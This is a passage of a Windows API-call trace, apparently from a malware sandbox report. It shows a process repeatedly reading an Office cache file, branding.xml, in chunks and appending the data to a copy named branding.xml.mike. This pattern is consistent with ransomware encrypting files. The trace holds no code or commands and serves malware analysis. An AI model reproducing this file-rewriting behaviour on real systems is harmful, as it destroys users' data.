dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.570] GetFileType (hFile=0x264) returned 0x1 [0041.570] GetFileType (hFile=0x264) returned 0x1 [0041.570] ReadFile (in: hFile=0x264, lpBuffer=0x22c499c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22c499c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.571] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.571] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.571] GetFileType (hFile=0x264) returned 0x1 [0041.571] GetFileType (hFile=0x264) returned 0x1 [0041.571] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x3c220 [0041.571] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.571] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.572] GetFileType (hFile=0x264) returned 0x1 [0041.572] GetFileType (hFile=0x264) returned 0x1 [0041.572] ReadFile (in: hFile=0x264, lpBuffer=0x22d19a8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22d19a8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.609] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.609] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.609] GetFileType (hFile=0x264) returned 0x1 [0041.609] GetFileType (hFile=0x264) returned 0x1 [0041.609] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x3ea20 [0041.610] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.610] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.610] GetFileType (hFile=0x264) returned 0x1 [0041.610] GetFileType (hFile=0x264) returned 0x1 [0041.611] ReadFile (in: hFile=0x264, lpBuffer=0x20dc624, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x20dc624*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.612] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.612] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.613] GetFileType (hFile=0x264) returned 0x1 [0041.613] GetFileType (hFile=0x264) returned 0x1 [0041.613] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x41220 [0041.613] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.613] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.613] GetFileType (hFile=0x264) returned 0x1 [0041.613] GetFileType (hFile=0x264) returned 0x1 [0041.613] ReadFile (in: hFile=0x264, lpBuffer=0x20eeb34, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x20eeb34*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.615] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.615] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.615] GetFileType (hFile=0x264) returned 0x1 [0041.615] GetFileType (hFile=0x264) returned 0x1 [0041.615] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x43a20 [0041.615] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.615] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.615] GetFileType (hFile=0x264) returned 0x1 [0041.615] GetFileType (hFile=0x264) returned 0x1 [0041.615] ReadFile (in: hFile=0x264, lpBuffer=0x20fbb40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x20fbb40*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.617] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.617] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.617] GetFileType (hFile=0x264) returned 0x1 [0041.617] GetFileType (hFile=0x264) returned 0x1 [0041.617] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x46220 [0041.617] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.617] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.617] GetFileType (hFile=0x264) returned 0x1 [0041.617] GetFileType (hFile=0x264) returned 0x1 [0041.617] ReadFile (in: hFile=0x264, lpBuffer=0x2108b4c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2108b4c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.619] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.619] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.619] GetFileType (hFile=0x264) returned 0x1 [0041.619] GetFileType (hFile=0x264) returned 0x1 [0041.619] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x48a20 [0041.619] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.619] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.619] GetFileType (hFile=0x264) returned 0x1 [0041.619] GetFileType (hFile=0x264) returned 0x1 [0041.619] ReadFile (in: hFile=0x264, lpBuffer=0x2115b58, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2115b58*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.621] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.621] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.621] GetFileType (hFile=0x264) returned 0x1 [0041.621] GetFileType (hFile=0x264) returned 0x1 [0041.621] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x4b220 [0041.621] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.621] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.621] GetFileType (hFile=0x264) returned 0x1 [0041.621] GetFileType (hFile=0x264) returned 0x1 [0041.621] ReadFile (in: hFile=0x264, lpBuffer=0x2122b64, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2122b64*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.623] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.623] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.623] GetFileType (hFile=0x264) returned 0x1 [0041.623] GetFileType (hFile=0x264) returned 0x1 [0041.623] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x4da20 [0041.623] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.623] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.623] GetFileType (hFile=0x264) returned 0x1 [0041.623] GetFileType (hFile=0x264) returned 0x1 [0041.624] ReadFile (in: hFile=0x264, lpBuffer=0x212fb70, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x212fb70*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.625] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.625] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.625] GetFileType (hFile=0x264) returned 0x1 [0041.625] GetFileType (hFile=0x264) returned 0x1 [0041.625] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x50220 [0041.625] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.625] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.625] GetFileType (hFile=0x264) returned 0x1 [0041.625] GetFileType (hFile=0x264) returned 0x1 [0041.625] ReadFile (in: hFile=0x264, lpBuffer=0x213cb7c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x213cb7c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.627] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.627] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.627] GetFileType (hFile=0x264) returned 0x1 [0041.627] GetFileType (hFile=0x264) returned 0x1 [0041.627] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x52a20 [0041.627] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.627] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.627] GetFileType (hFile=0x264) returned 0x1 [0041.627] GetFileType (hFile=0x264) returned 0x1 [0041.627] ReadFile (in: hFile=0x264, lpBuffer=0x2149b88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2149b88*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.629] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.629] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.629] GetFileType (hFile=0x264) returned 0x1 [0041.629] GetFileType (hFile=0x264) returned 0x1 [0041.629] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x55220 [0041.629] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.629] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.629] GetFileType (hFile=0x264) returned 0x1 [0041.629] GetFileType (hFile=0x264) returned 0x1 [0041.629] ReadFile (in: hFile=0x264, lpBuffer=0x2156b94, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2156b94*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.631] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.631] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.631] GetFileType (hFile=0x264) returned 0x1 [0041.631] GetFileType (hFile=0x264) returned 0x1 [0041.631] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x57a20 [0041.631] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.631] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.631] GetFileType (hFile=0x264) returned 0x1 [0041.631] GetFileType (hFile=0x264) returned 0x1 [0041.631] ReadFile (in: hFile=0x264, 